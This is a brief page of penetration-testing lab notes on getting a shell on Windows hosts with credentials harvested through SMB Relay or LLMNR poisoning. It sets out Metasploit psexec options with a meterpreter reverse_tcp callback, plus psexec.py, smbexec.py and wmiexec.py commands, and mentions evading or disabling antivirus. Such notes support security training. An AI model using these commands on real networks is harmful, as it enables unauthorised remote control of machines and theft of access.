Gaining Shell Access
Once use the hashes from SMB Relay or LLMNR Poisoning we should have some creds we can sue to gain shell access
Spin up
metasploit
# Start metasploit
msfconsole
# Use psexec exploit
search psexec
# Look for windows/smb/psexec
# Set options
set rhosts TARGET_IP
set smbdomain TARGET_DOMAIN
set smbpass USER_PASS
set smbuser TARGET_USER
set payload windows/x64/meterpreter/reverse_tcp
set lhost YOUR_IPAnother option is to user
psexec.py
# Run psexec.py
psexec.py TARGET_DOMAIN/TARGET_USER:USER_PASS@TARGET_IP
# Example
psexec.py marvel.local/fcastle:[email protected]
Other options
These are good to sneak around, get information, disable things like AV, etc.
smbexec.py TARGET_DOMAIN/TARGET_USER:USER_PASS@TARGET_IP
wmiexec.py TARGET_DOMAIN/TARGET_USER:USER_PASS@TARGET_IPLast updated